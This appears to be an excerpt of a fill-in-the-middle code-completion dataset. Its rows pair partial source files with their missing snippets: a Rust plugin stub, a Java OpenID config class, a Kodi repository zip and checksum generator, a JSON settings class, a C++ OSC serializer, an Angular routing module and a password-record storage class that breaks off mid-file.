prompt
large_stringlengths
70
991k
completion
large_stringlengths
0
1.02k
<|file_name|>disk.rs<|end_file_name|><|fim▁begin|>use errors::*; use plugin::*; #[derive(Debug)] struct DiskInput {} impl DiskInput { pub fn new() -> DiskInput { DiskInput {} }<|fim▁hole|> impl Input for DiskInput { fn setup(&self, _ctx: PluginContext) -> Result<Box<InputInstance>> { Ok(Box::new(DiskInputInstance::new())) } } #[derive(Debug)] struct DiskInputInstance {} impl DiskInputInstance { pub fn new() -> DiskInputInstance { DiskInputInstance {} } } impl InputInstance for DiskInputInstance {} pub fn input() -> Result<Box<Input>> { Ok(Box::new(DiskInput::new())) }<|fim▁end|>
}
<|file_name|>OpenIdConfig.java<|end_file_name|><|fim▁begin|>/** * Copyright (C) 2016-2018 Harald Kuhn * * Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on * an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the * specific language governing permissions and limitations under the License. */ package rocks.bottery.connector.ms.model; import java.io.Serializable; import java.util.List; import javax.xml.bind.annotation.XmlAccessType; import javax.xml.bind.annotation.XmlAccessorType; import javax.xml.bind.annotation.XmlElement; import javax.xml.bind.annotation.XmlRootElement; /* { "issuer":"https://api.botframework.com", "authorization_endpoint":"https://invalid.botframework.com/", "jwks_uri":"https://login.botframework.com/v1/keys", "id_token_signing_alg_values_supported":["RSA256"], "token_endpoint_auth_methods_supported":["private_key_jwt"] } */ @XmlRootElement @XmlAccessorType(XmlAccessType.FIELD) public class OpenIdConfig implements Serializable { private static final long serialVersionUID = 1L; @XmlElement(name = "issuer") private String issuer; @XmlElement(name = "authorization_endpoint") private String authorizationEndpoint; @XmlElement(name = "jwks_uri") private String jwksUri; @XmlElement(name = "id_token_signing_alg_values_supported") private List<String> idTokenSigningAlgValuesSupported = null; @XmlElement(name = "token_endpoint_auth_methods_supported") private List<String> tokenEndpointAuthMethodsSupported = null; /** * * @return The issuer */ public String getIssuer() { return issuer; } /** * * @param issuer * The issuer */ public void setIssuer(String issuer) { this.issuer = issuer; } /** * * @return The authorizationEndpoint */ public String getAuthorizationEndpoint() { return authorizationEndpoint; } /** * * @param authorizationEndpoint * The authorization_endpoint */ public void setAuthorizationEndpoint(String authorizationEndpoint) { this.authorizationEndpoint = authorizationEndpoint; } /** * * @return The jwksUri */ public String getJwksUri() { return jwksUri; } /** * * @param jwksUri * The jwks_uri */ public void setJwksUri(String jwksUri) { this.jwksUri = jwksUri; } /** * * @return The idTokenSigningAlgValuesSupported */ public List<String> getIdTokenSigningAlgValuesSupported() { return idTokenSigningAlgValuesSupported; } /** * * @param idTokenSigningAlgValuesSupported * The id_token_signing_alg_values_supported */ public void setIdTokenSigningAlgValuesSupported(List<String> idTokenSigningAlgValuesSupported) { this.idTokenSigningAlgValuesSupported = idTokenSigningAlgValuesSupported; } /** * * @return The tokenEndpointAuthMethodsSupported */ public List<String> getTokenEndpointAuthMethodsSupported() { return tokenEndpointAuthMethodsSupported; } /** * <|fim▁hole|> * The token_endpoint_auth_methods_supported */ public void setTokenEndpointAuthMethodsSupported(List<String> tokenEndpointAuthMethodsSupported) { this.tokenEndpointAuthMethodsSupported = tokenEndpointAuthMethodsSupported; } @Override public String toString() { StringBuilder sb = new StringBuilder(); sb.append("class OpenIdConfig {\n"); sb.append(" issuer: ").append(toIndentedString(issuer)).append("\n"); sb.append(" authorization_endpoint: ").append(toIndentedString(authorizationEndpoint)).append("\n"); sb.append(" jwksUri: ").append(toIndentedString(jwksUri)).append("\n"); sb.append(" tokenEndpointAuthMethodsSupported: ") .append(toIndentedString(this.tokenEndpointAuthMethodsSupported)).append("\n"); sb.append(" id_token_signing_alg_values_supported: ") .append(toIndentedString(this.idTokenSigningAlgValuesSupported)).append("\n"); sb.append("}"); return sb.toString(); } /** * Convert the given object to string with each line indented by 4 spaces * (except the first line). */ private static String toIndentedString(Object o) { if (o == null) { return "null"; } return o.toString().replace("\n", "\n "); } }<|fim▁end|>
* @param tokenEndpointAuthMethodsSupported
<|file_name|>addons_xml_generator3.py<|end_file_name|><|fim▁begin|>#!/usr/bin/python # *<|fim▁hole|># * it under the terms of the GNU General Public License as published by # * the Free Software Foundation; either version 2, or (at your option) # * any later version. # * # * This Program is distributed in the hope that it will be useful, # * but WITHOUT ANY WARRANTY; without even the implied warranty of # * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # * GNU General Public License for more details. # * # * You should have received a copy of the GNU General Public License # * along with XBMC; see the file COPYING. If not, write to # * the Free Software Foundation, 675 Mass Ave, Cambridge, MA 02139, USA. # * http://www.gnu.org/copyleft/gpl.html # * # * Based on code by tknorris: # * https://offshoregit.com/tknorris/tknorris-release-repo/raw/master/addons_xml_generator2.py # * Based on code by j48antialias: # * https://anarchintosh-projects.googlecode.com/files/addons_xml_generator.py # * # * Changes since v2: # * - (assumed) zips reside in folder "download" # * - md5 checksum creation added for zips # * - Skip moving files and zip creation if zip file for the same version already exists # * - alphabetical sorting """ addons.xml generator """ import os import sys import time import re import xml.etree.ElementTree as ET try: import shutil, zipfile except Exception as e: print('An error occurred importing module!\n%s\n' % e) # Compatibility with 3.0, 3.1 and 3.2 not supporting u"" literals print(sys.version) if sys.version < '3': import codecs def u(x): return codecs.unicode_escape_decode(x)[0] else: def u(x): return x class Generator: """ Generates a new addons.xml file from each addons addon.xml file and a new addons.xml.md5 hash file. Must be run from the root of the checked-out repo. Only handles single depth folder structure. """ def __init__(self): # generate files self._generate_addons_file() self._generate_md5_file() # notify user print("Finished updating addons xml and md5 files\n") def _generate_addons_file(self): # addon list addons = sorted(os.listdir(".")) # final addons text addons_xml = u("<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\n<addons>\n") # loop thru and add each addons addon.xml file for addon in addons: try: # skip any file or .svn folder or .git folder if (not os.path.isdir(addon) or addon == ".svn" or addon == ".git" or addon == ".github" or addon == "download"): continue # create path _path = os.path.join(addon, "addon.xml") # split lines for stripping xml_lines = open(_path, "r").read().splitlines() # new addon addon_xml = "" # loop thru cleaning each line for line in xml_lines: # skip encoding format line if (line.find("<?xml") >= 0): continue # add line if sys.version < '3': addon_xml += unicode(line.rstrip() + "\n", "UTF-8") else: addon_xml += line.rstrip() + "\n" # we succeeded so add to our final addons.xml text addons_xml += addon_xml.rstrip() + "\n\n" except Exception as e: # missing or poorly formatted addon.xml print("Excluding %s for %s" % (_path, e)) # clean and add closing tag addons_xml = addons_xml.strip() + u("\n</addons>\n") # save file self._save_file(addons_xml.encode("UTF-8"), file="addons.xml") def _generate_md5_file(self): # create a new md5 hash try: import md5 m = md5.new(open("addons.xml", "r").read()).hexdigest() except ImportError: import hashlib m = hashlib.md5(open("addons.xml", "r", encoding="UTF-8").read().encode("UTF-8")).hexdigest() # save file try: self._save_file(m.encode("UTF-8"), file="addons.xml.md5") except Exception as e: # oops print("An error occurred creating addons.xml.md5 file!\n%s" % e) def _save_file(self, data, file): try: # write data to the file (use b for Python 3) open(file, "wb").write(data) except Exception as e: # oops print("An error occurred saving %s file!\n%s" % (file, e)) def zipfolder(foldername, target_dir, zips_dir, addon_dir): zipobj = zipfile.ZipFile(zips_dir + foldername, 'w', zipfile.ZIP_DEFLATED) rootlen = len(target_dir) + 1 for base, dirs, files in os.walk(target_dir): for f in files: fn = os.path.join(base, f) zipobj.write(fn, os.path.join(addon_dir, fn[rootlen:])) zipobj.close() if (__name__ == "__main__"): # start Generator() # rezip files and move try: print('Starting zip file creation...') rootdir = sys.path[0] zipsdir = rootdir + os.sep + 'download' filesinrootdir = sorted(os.listdir(rootdir)) for x in filesinrootdir: if re.search("^(context|plugin|script|service|skin|repository|docker)" , x) and not re.search('.zip', x): zipfilename = x + '.zip' zipfilenamefirstpart = zipfilename[:-4] zipfilenamelastpart = zipfilename[len(zipfilename) - 4:] zipsfolder = os.path.normpath(os.path.join('download', x)) + os.sep foldertozip = rootdir + os.sep + x filesinfoldertozip = sorted(os.listdir(foldertozip)) # #check if download folder exists if not os.path.exists(zipsfolder): os.makedirs(zipsfolder) print('Directory doesn\'t exist, creating: ' + zipsfolder) # #get addon version number if "addon.xml" in filesinfoldertozip: tree = ET.parse(os.path.join(rootdir, x, "addon.xml")) root = tree.getroot() for elem in root.iter('addon'): print('%s %s version: %s' % (x, elem.tag, elem.attrib['version'])) version = '-' + elem.attrib['version'] # # #check for existing zips if not os.path.exists(zipsfolder + x + version + '.zip'): # #check if and move addon, changelog, fanart and icon to zipdir for y in filesinfoldertozip: # print('processing file: ' + os.path.join(rootdir,x,y)) if re.search("addon|changelog|icon|fanart", y): shutil.copyfile(os.path.join(rootdir, x, y), os.path.join(zipsfolder, y)) print('Copying %s to %s' % (y, zipsfolder)) # #check for and zip the folders print('Zipping %s and moving to %s\n' % (x, zipsfolder)) try: zipfolder(zipfilenamefirstpart + version + zipfilenamelastpart, foldertozip, zipsfolder, x) print('zipped with zipfolder') # # #create md5 checksum for zips import hashlib try: m = hashlib.md5(open("%s" % (zipsfolder + x + version + '.zip'), "rb").read()).hexdigest() open("%s" % (zipsfolder + x + version + '.zip.md5'), "wb").write(m.encode("UTF-8")) print("zip.md5 file created\n") except Exception as e: print("An error occurred creating zip.md5 file!\n%s" % e) except: if os.path.exists(zipsfolder + x + version + '.zip'): os.remove(zipsfolder + x + version + '.zip') print('trying shutil') try: shutil.move(shutil.make_archive(foldertozip + version, 'zip', rootdir, x), zipsfolder) print('zipped with shutil\n') except Exception as e: print('Cannot create zip file\nshutil %s\n' % e) else: print('Zip file for %s version %s already exists, skipping moving files and zip creation.\n' % (x, version)) except Exception as e: print('Cannot create or move the needed files\n%s' % e) print('Done')<|fim▁end|>
# * Copyright (C) 2012-2013 Garrett Brown # * Copyright (C) 2010 j48antialias # * # * This Program is free software; you can redistribute it and/or modify
<|file_name|>Settings.py<|end_file_name|><|fim▁begin|>import collections import json import os class Settings(collections.MutableMapping): def __init__(self, filename): self.filename = filename self.store = {} self.read() def read(self): if os.path.exists(self.filename): with open(self.filename, 'r') as f: self.store = json.load(f) else: self.write() def write(self): with open(self.filename, 'w') as f: json.dump(self.store, f, sort_keys=True, indent=2, separators=(',', ': ')) def __setitem__(self, key, value): self.store[key] = value self.write() def __delitem__(self, key): del self.store[key] self.write() def __getitem__(self, key): return self.store[key] def __iter__(self): return iter(self.store) <|fim▁hole|> return len(self.store)<|fim▁end|>
def __len__(self):
<|file_name|>osc.cpp<|end_file_name|><|fim▁begin|>// Copyright (c) 2016 Antony Arciuolo. See License.txt regarding use. #include <oBase/osc.h> #include <oCore/assert.h> #include <oCore/byte.h> #include <oCore/endian.h> #include <oString/string.h> #define oUNKNOWN_SIZE SIZE_MAX #define oASSERT_ALIGNED(x) oAssert(aligned(x, 4), "The destination pointer must be 4-byte aligned"); namespace ouro { namespace osc { // If a nullptr is serialized as a string, we still need to identify that the // occurance happened, so write a special character. static const char NULL_STRING = -1; // Field alignment is in terms of offset from base struct pointer, not absolute // memory. This is really apparent when there are double-word types, such as // long longs on 32-bit builds. void* move_to_next_field(const void* struct_base, const void* last_field_end_unaligned, size_t next_field_alignment) { ptrdiff_t offset = ptrdiff_t((const uint8_t*)last_field_end_unaligned - (const uint8_t*)struct_base); return byte_add((void*)struct_base, align(offset, next_field_alignment)); } size_t SizeofFixedString(int type) { return (type - '0') * 64 * sizeof(char); } template<typename ptr_t> struct Visitor { typedef std::function<void(int type, ptr_t field, size_t field_size)> Fn; }; namespace STRUCT { // STRUCT* Aligns to the size of type and visits data at that address and then // returns a pointer just after the read field template<typename ptr_t> static ptr_t visit_next_intrinsic(int type, ptr_t struct_base, ptr_t field, size_t field_size, const typename Visitor<ptr_t>::Fn& visitor) { void* p = move_to_next_field(struct_base, field, field_size); visitor(type, p, field_size); return byte_add(p, field_size); } template<typename ptr_t> static ptr_t visit_next_char(ptr_t struct_base, ptr_t field, const typename Visitor<ptr_t>::Fn& visitor) { visitor('c', field, sizeof(char)); return byte_add(field, sizeof(char)); } template<typename ptr_t> static ptr_t visit_next_string(ptr_t struct_base, ptr_t field, const typename Visitor<ptr_t>::Fn& visitor) { void* p = move_to_next_field(struct_base, field, sizeof(const char*)); const char* s = *(const char**)p; visitor('s', p, s ? (strlen(s)+1) : sizeof(NULL_STRING)); return byte_add(p, sizeof(ptr_t)); } template<typename ptr_t> static ptr_t visit_next_fixed_string(int type, ptr_t struct_base, ptr_t field, const typename Visitor<ptr_t>::Fn& visitor) { void* p = move_to_next_field(struct_base, field, sizeof(char)); visitor(type, p, strlen((const char*)p)+1); return byte_add(p, SizeofFixedString(type)); } template<typename ptr_t> static ptr_t visit_next_blob(ptr_t struct_base, ptr_t field, const typename Visitor<ptr_t>::Fn& visitor) { void* p = move_to_next_field(struct_base, field, sizeof(int)); int size = *(int*)p; p = move_to_next_field(struct_base, byte_add(p, sizeof(int)), sizeof(ptr_t)); visitor('b', *(void**)p, size); return byte_add(p, sizeof(ptr_t)); } } // namespace STRUCT template<typename ptr_t> bool visit_struct_fields_internal(const typename Visitor<ptr_t>::Fn& visitor, const char* typetags, ptr_t _struct, size_t struct_size, char* optional_patch_tags = nullptr) { if (!visitor || !typetags || !_struct || !struct_size) oThrow(std::errc::invalid_argument, "null value"); if (*typetags != ',') oThrow(std::errc::invalid_argument, "TypeTags must start with a ',' character"); auto tag = typetags; auto patchTag = optional_patch_tags; ptr_t p = _struct; auto end = byte_add(p, struct_size); while (*(++tag)) { if (p >= end) { if (p == end && (*tag == 0 || *tag == '[' || *tag == ']')) // If we finish on any of these tags it's ok since they do not expect valid data return true; oThrow(std::errc::invalid_argument, "Tag string \"%s\" has run past the size of the struct pointed to by pointer 0x%p", typetags, _struct); } if (patchTag) ++patchTag; switch (*tag) { case 'r': case 'i': case 'f': p = STRUCT::visit_next_intrinsic(*tag, _struct, p, 4, visitor); break; case 'h': case 't': case 'd': p = STRUCT::visit_next_intrinsic(*tag, _struct, p, 8, visitor); break; case 'c': p = STRUCT::visit_next_char(_struct, p, visitor); break; case 's': p = STRUCT::visit_next_string(_struct, p, visitor); break; case 'b': p = STRUCT::visit_next_blob(_struct, p, visitor); break; case '1': case '2': case '3': case '4': case '5': case '6': case '7': case '8': case '9': p = STRUCT::visit_next_fixed_string(*tag, _struct, p, visitor); break; case 'T': case 'F': { // Special case for boolean types bool* pBTag = (bool*)p; int bits = 0; while(*tag == 'T' || *tag == 'F') { visitor(*tag, nullptr, 0); if (patchTag) { *patchTag = *pBTag ? 'T' : 'F'; ++patchTag; } ++bits; ++tag; ++pBTag; p = byte_add(p, 1); } // Offset number of bytes plus padding //p = byte_add(p, (bits / 8) + 1); // Back the tags up so we increment correctly in the next pass --tag; if (patchTag) --patchTag; } break; default: visitor(*tag, nullptr, 0); break; } } return true; } bool visit_struct_fields(const char* typetags, void* _struct, size_t struct_size, const visitor_fn& visitor) { return visit_struct_fields_internal<void*>(visitor, typetags, _struct, struct_size, nullptr); } bool visit_struct_fields(const char* typetags, const void* _struct, size_t struct_size, const visitor_const_fn& visitor) { return visit_struct_fields_internal<const void*>(visitor, typetags, _struct, struct_size, nullptr); } namespace TAG { // TAG functions assume 4-byte alignment, assumes char is stored as an int and // does endian swapping on the data before visiting. template<typename T, typename ptr_t, typename fn_t> static ptr_t visit_next_intrinsic(int type, ptr_t _pArgument, const fn_t& visitor) { T swapped = to_big_endian(*(const T*)_pArgument); visitor(type, &swapped, sizeof(T)); return byte_add(_pArgument, sizeof(T)); } template<typename ptr_t, typename fn_t> static ptr_t visit_next_char(ptr_t _pArgument, const fn_t& visitor) { int cAsInt = to_big_endian(*(const int*)_pArgument); char c = (char)cAsInt; visitor('c', &c, sizeof(char)); // be honest about data and describe as a char return byte_add(_pArgument, sizeof(int)); // move past the original int in the buffer } template<typename ptr_t, typename fn_t> static ptr_t visit_next_string(int type, ptr_t _pArgument, const fn_t& visitor) { size_t size = strlen((const char*)_pArgument) + 1; visitor(type, _pArgument, size); return byte_add(_pArgument, align(size, 4)); } template<typename ptr_t, typename fn_t> static ptr_t visit_next_blob(ptr_t _pArgument, const fn_t& visitor) { int size = to_big_endian(*(const int*)_pArgument); ptr_t p = byte_add(_pArgument, sizeof(int)); visitor('b', p, size); return byte_add(p, align(size, 4)); } } // namespace TAG template<typename ptr_t, typename fn_t> bool visit_msg_type_tags_internal(const char* typetags, ptr_t msg_args, fn_t visitor) { if (!visitor || !typetags || *typetags != ',' || !msg_args) oThrow(std::errc::invalid_argument, "valid typetags must be specified that starts with ','"); auto tag = typetags; auto p = msg_args; while (*(++tag)) { switch (*tag) { case 'r': case 'i': case 'f': p = TAG::visit_next_intrinsic<int>(*tag, p, visitor); break; case 'h': case 't': case 'd': p = TAG::visit_next_intrinsic<long long>(*tag, p, visitor); break; case 'c': p = TAG::visit_next_char(p, visitor); break; case 'b': p = TAG::visit_next_blob(p, visitor); break; case 's': case '1': case '2': case '3': case '4': case '5': case '6': case '7': case '8': case '9': p = TAG::visit_next_string(*tag, p, visitor); break; default: visitor(*tag, nullptr, 0); break; } } return true; } bool visit_msg_type_tags(const char* typetags, const void* msg_args, const visitor_const_fn& visitor) { return visit_msg_type_tags_internal(typetags, msg_args, visitor); } bool visit_msg_type_tags(const char* typetags, void* msg_args, const visitor_fn& visitor) { return visit_msg_type_tags_internal(typetags, msg_args, visitor); } static void sum_field_sizes(int type, const void* field, size_t field_size, size_t* out_size_sum) { *out_size_sum += align(field_size, 4); if (type == 'b') *out_size_sum += 4; // for the size item } size_t calc_num_fields(const char* typetags) { bool InArray = false; size_t nFields = 0; const char* tag = typetags; while (*(++tag)) { if (*tag == '[') InArray = true; else if (*tag == ']') { nFields++; InArray = false; } if (!InArray) { static const char* countedTags = "rifhtdcsb123456789P"; if (strchr(countedTags, *tag)) nFields++; } } return nFields; } size_t calc_args_data_size(const char* typetags, const void* _struct, size_t struct_size) { size_t size = 0; if (!visit_struct_fields(typetags, _struct, struct_size, std::bind(sum_field_sizes, std::placeholders::_1, std::placeholders::_2, std::placeholders::_3, &size))) oThrow(std::errc::invalid_argument, ""); return size; } size_t calc_msg_size(const char* address, const char* typetags, size_t _ArgumentsDataSize) { size_t size = align(strlen(address) + 1, 4); if (typetags) size += align(strlen(typetags) + 1, 4); return size + _ArgumentsDataSize; } size_t calc_bundle_size(size_t _NumSubbundles, size_t _SumOfAllSubbundleSizes) { // sizeof "#bundle\0" + sizeof time-tag + a size per bundle + size of all bundles return 8 + 8 + (sizeof(int) * _NumSubbundles) + _SumOfAllSubbundleSizes; } template<typename T> void AlignedIncrement(size_t* pSize) { *pSize = align(*pSize, sizeof(T)) + sizeof(T); } size_t calc_deserialized_struct_size(const char* typetags) { if (!typetags || *typetags != ',') oThrow(std::errc::invalid_argument, "valid typetags must be specified that starts with ','"); size_t size = 0; const char* tag = typetags; while (*(++tag)) { switch(*tag) { case 'r': case 'i': case 'f': AlignedIncrement<int>(&size); break; case 'h': case 't': case 'd': AlignedIncrement<long long>(&size); break; case 'c': AlignedIncrement<char>(&size); break; case 'b': AlignedIncrement<int>(&size); AlignedIncrement<void*>(&size); break; case 's': AlignedIncrement<void*>(&size); break; case '1': case '2': case '3': case '4': case '5': case '6': case '7': case '8': case '9': size += atoi(tag) * 64; break; case 'T': case 'F': { int bits = 1; while(tag[1] == 'T' || tag[1] == 'F') { ++bits; ++tag; } size += (bits / 8) + 1; } } } return align(size, sizeof(int)); } const char* get_msg_address(const void* msg) { return *(const char*)msg == '/' ? (const char*)msg : nullptr; } const char* get_msg_type_tags(const void* msg) { const char* Address = get_msg_address(msg); if (Address) { const char* TypeTags = byte_add(Address, align(strlen(Address)+1, 4)); return *TypeTags == ',' ? TypeTags : nullptr; } return nullptr; } namespace SERIALIZE { template<typename T> static void* next_intrinsic(const void* struct_base, void* dst, const void* last_field_end_unaligned) { oASSERT_ALIGNED(dst);<|fim▁hole|> const void* s = move_to_next_field(struct_base, last_field_end_unaligned, std::alignment_of<T>::value); *(T*)dst = to_big_endian(*(const T*)s); return byte_add(dst, sizeof(T)); } static void* NextChar(void* dst, const void* src) { oASSERT_ALIGNED(dst); int cAsInt = *(const char*)src; *(int*)dst = to_big_endian(cAsInt); return byte_add(dst, sizeof(int)); } static void* copy_next_buffer(void* dst, size_t dst_size, const void* buf, size_t buf_size) { oASSERT_ALIGNED(dst); oAssert(dst_size >= align(buf_size, 4), ""); oAssert(buf, "A valid buffer must be specified"); memcpy(dst, buf, buf_size); // pad with zeros out to 4-byte alignment char* p = (char*)byte_add(dst, buf_size); char* pend = align(p, 4); while (p < pend) *p++ = 0; return p; } static void* next_string(void* dst, size_t dst_size, const char* _String) { oASSERT_ALIGNED(dst); if (_String) return copy_next_buffer(dst, dst_size, _String, strlen(_String) + 1); return copy_next_buffer(dst, dst_size, &NULL_STRING, 1); } static void* next_blob(void* dst, size_t dst_size, const void* src, size_t src_size) { oASSERT_ALIGNED(dst); *(int*)dst = to_big_endian((int)src_size); return copy_next_buffer(byte_add(dst, sizeof(int)), oUNKNOWN_SIZE, src, src_size); } } // namespace SERIALIZE static void serializer(int type, const void* field, size_t field_size, const void* out_struct_base, void** ppDest, void* pDstEnd) { oAssert(*ppDest < pDstEnd, "Writing past end of buffer"); switch (type) { case 'r': case 'i': case 'f': *ppDest = SERIALIZE::next_intrinsic<int>(out_struct_base, *ppDest, field); break; case 'h': case 't': case 'd': *ppDest = SERIALIZE::next_intrinsic<long long>(out_struct_base, *ppDest, field); break; case 'c': *ppDest = SERIALIZE::NextChar(*ppDest, field); break; case 's': *ppDest = SERIALIZE::next_string(*ppDest, oUNKNOWN_SIZE, *(const char**)field); break; // oUNKNOWN_SIZE is unsafe, ignoring buffer boundaries but this should already be allocated correctly case 'b': *ppDest = SERIALIZE::next_blob(*ppDest, oUNKNOWN_SIZE, field, field_size); break; case '1': case '2': case '3': case '4': case '5': case '6': case '7': case '8': case '9': *ppDest = SERIALIZE::next_string(*ppDest, oUNKNOWN_SIZE, (const char*)field); default: break; } } namespace DESERIALIZE { template<typename T> static void* next_intrinsic(void* struct_base, void* dst, const void* src) { void* p = move_to_next_field(struct_base, dst, std::alignment_of<T>::value); *(T*)p = *(const T*)src; return byte_add(p, sizeof(T)); } static void* next_string(void* struct_base, void* dst, const char* _String) { // assign pointer into message buffer const char** s = (const char**)move_to_next_field(struct_base, dst, std::alignment_of<const char**>::value); *s = *(const char*)_String == NULL_STRING ? nullptr : (const char*)_String; return byte_add(s, sizeof(const char*)); } static void* next_fixed_string(void* struct_base, void* dst, const char* _String, size_t _NumChars) { // assign pointer into message buffer char* s = (char*)move_to_next_field(struct_base, dst, std::alignment_of<char>::value); strlcpy(s, _String, _NumChars); return byte_add(s, _NumChars * sizeof(char)); } static void* next_blob(void* struct_base, void* dst, const void* src, size_t _SizeofSource) { int* p = (int*)move_to_next_field(struct_base, dst, std::alignment_of<int>::value); *p = (int)_SizeofSource; p = (int*)move_to_next_field(struct_base, byte_add(p, sizeof(int)), std::alignment_of<void*>::value); *(const void**)p = src; return byte_add(p, sizeof(const void*)); } } // namespace DESERIALIZE static void deserializer(int type, const void* field, size_t field_size, void* out_struct_base, void** ppDest, void* pDstEnd) { oAssert(*ppDest < pDstEnd || type == '[' || type == ']', "Writing past end of buffer"); if ('T' != type && 'F' != type) *ppDest = align(*ppDest, sizeof(char)); switch (type) { case 'r': case 'i': case 'f': *ppDest = DESERIALIZE::next_intrinsic<int>(out_struct_base, *ppDest, field); break; case 'h': case 't': case 'd': *ppDest = DESERIALIZE::next_intrinsic<long long>(out_struct_base, *ppDest, field); break; case 'c': *ppDest = DESERIALIZE::next_intrinsic<char>(out_struct_base, *ppDest, field); break; case 's': *ppDest = DESERIALIZE::next_string(out_struct_base, *ppDest, (const char*)field); break; case 'b': *ppDest = DESERIALIZE::next_blob(out_struct_base, *ppDest, field, field_size); break; case 'T': *(bool*)(*ppDest) = true; (*ppDest) = (bool*)(*ppDest) + 1; break; case 'F': *(bool*)(*ppDest) = false; (*ppDest) = (bool*)(*ppDest) + 1; break; case '1': case '2': case '3': case '4': case '5': case '6': case '7': case '8': case '9': *ppDest = DESERIALIZE::next_fixed_string(out_struct_base, *ppDest, (const char*)field, SizeofFixedString(type)); break; default: break; } } size_t serialize_struct_to_msg(const char* address, const char* typetags, const void* _struct, size_t struct_size, void* msg, size_t msg_size) { if (!address || *address != '/' || !msg || !_struct || struct_size == 0) oThrow(std::errc::invalid_argument, ""); void* p = msg; void* pend = byte_add(p, msg_size); p = SERIALIZE::next_string(p, msg_size, address); char* pPatchTag = (char*)p; p = SERIALIZE::next_string(p, size_t((uint8_t*)pend - (uint8_t*)p), typetags); size_t szSerializedMessage = 0; oAssert(size_t((uint8_t*)pend - (uint8_t*)p) >= calc_args_data_size(typetags, _struct, struct_size), ""); if (!visit_struct_fields_internal(std::bind(serializer, std::placeholders::_1, std::placeholders::_2, std::placeholders::_3, _struct, &p, pend), typetags, _struct, struct_size, pPatchTag)) return 0; return (char*)p - (char*)msg; } bool deserialize_msg_to_struct(const void* msg, void* _struct, size_t struct_size) { // if struct ptr is not aligned, all the alignment logic will be off oCheck(msg && aligned(_struct, 4), std::errc::invalid_argument, ""); const char* tags = get_msg_type_tags(msg); oCheck(tags, std::errc::protocol_error, "failed to read message type tags"); const void* args = (const void*)byte_add(tags, align(strlen(tags)+1, 4)); void* p = _struct; void* pend = byte_add(_struct, struct_size); return visit_msg_type_tags(tags, args, std::bind(deserializer, std::placeholders::_1, std::placeholders::_2, std::placeholders::_3, _struct, &p, pend)); } static bool IsBoolTag(char _TypeTag) { return _TypeTag == 'T' || _TypeTag == 'F' || _TypeTag == 't' || _TypeTag == 'f'; } bool type_tags_match(const char* typetags0, const char* typetags1) { oCheck(typetags0 && *typetags0 == ',' && typetags1 && *typetags1 == ',', std::errc::invalid_argument, "valid typetags must be specified that starts with ','"); size_t len0 = strlen(typetags0); size_t len1 = strlen(typetags1); oCheck(len0 != len1, std::errc::invalid_argument, "length mismatch"); while (*typetags0) { if (*typetags0 != *typetags1 && (!IsBoolTag(*typetags0) || !IsBoolTag(*typetags1))) oCheck(*typetags0 == *typetags1 || (IsBoolTag(*typetags0) && IsBoolTag(*typetags1)), std::errc::protocol_error, "tags mismatch"); typetags0++; typetags1++; } return true; } ntp_timestamp get_bundle_timestamp(const void* osc_bundle) { oAssert(is_bundle(is_bundle), "The specified pointer is not a bundle"); return to_big_endian(*(ntp_timestamp*)byte_add(osc_bundle, 8)); } struct tok_ctx { const void* subbundle; const void* end; size_t size; int cookie; }; const void* tokenize(const void* osc_packet, size_t osc_packet_size, void** out_ctx) { if (osc_packet) { *out_ctx = nullptr; if (!is_bundle(osc_packet)) return nullptr; const void* p = byte_add(osc_packet, 16); // +8 #bundle + 8 NTPTime tok_ctx* ctx = new tok_ctx(); ctx->size = to_big_endian(*(int*)p); ctx->subbundle = byte_add(p, sizeof(int)); ctx->end = byte_add(osc_packet, osc_packet_size); ctx->cookie = 'OSCT'; *out_ctx = ctx; return ctx->subbundle; } oAssert(out_ctx, "A valid context must be specified"); tok_ctx* ctx = (tok_ctx*)*out_ctx; oAssert(ctx && ctx->cookie == 'OSCT', "Invalid context"); const void* pNext = byte_add(ctx->subbundle, ctx->size); if (pNext >= ctx->end) { delete ctx; *out_ctx = nullptr; return nullptr; } ctx->size = to_big_endian(*(int*)pNext); ctx->subbundle = byte_add(pNext, sizeof(int)); return ctx->subbundle; } void close_tokenize(void** out_ctx) { oAssert(out_ctx, "A valid context must be specified"); tok_ctx* ctx = (tok_ctx*)*out_ctx; oAssert(ctx && ctx->cookie == 'OSCT', "Invalid context"); delete ctx; *out_ctx = nullptr; } }}<|fim▁end|>
<|file_name|>bookmarks-routing.module.ts<|end_file_name|><|fim▁begin|>import { NgModule } from '@angular/core'; import { RouterModule, Routes } from '@angular/router'; import { BookmarksComponent } from './bookmarks.component'; const bookmarkRoutes: Routes = [ { path: 'bookmarks', component: BookmarksComponent } ]; @NgModule({ imports: [<|fim▁hole|> exports: [ RouterModule ] }) export class BookmarksRoutingModule { }<|fim▁end|>
RouterModule.forChild(bookmarkRoutes) ],
<|file_name|>file_store.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python # -*- coding:utf-8 -*- """ """ from exception import * class base_storage: def __init__(self, usr=None, usr_key=None): self.usr_key = None self.usr = None self.records = [] if usr is None: return self.load_info_from_file() if self.usr != usr: raise UsrError if self.usr_key != usr_key: raise PasswdError def new_user(self, usr, usr_key): """ create or register new user to file storage """ if self.usr is not None: raise LoginError, "Login In Usr Can Not Create New Usr,You Should Logout First." self.usr = usr self.usr_key = usr_key self.flush_all() def load_info_from_file(self, filename="passwd"): """ load and parse usr-passwd and usr account info """ with open(filename) as f: for line in f: line = line.strip('\n') if line is "" or line.startswith("#") or line.startswith('"""'): continue if self.parse_manager_usr_info(line): continue else: record = self.parse_manager_record(line) self.records.append(record) if self.usr is None or self.usr_key is None: raise UsrError def parse_manager_usr_info(self, info_str): """ parse account-manager usr info to usr and passwd """ info_list = info_str.split(":") if len(info_list) is not 2: return False else: if info_list[0] == "usr": self.usr = info_list[1] elif info_list[0] == "key": self.usr_key = info_list[1] if len(self.usr_key) is not 64: raise ValueError else: return False return True def parse_manager_record(self, info_str): """ parse one record string to record tuple """ info_list = info_str.split(":") if len(info_list) is not 6: return None return info_list[0], info_list[1], info_list[2], info_list[3], info_list[4], info_list[5] def get_usr_info(self, usr=None): """Export interface """ return self.usr, self.usr_key def get_usr_key(self, usr=None): """Export interface """ return self.usr_key def get_records(self): """Export interface """ return self.records def flush_one_record(self, record): """ append one record to record file 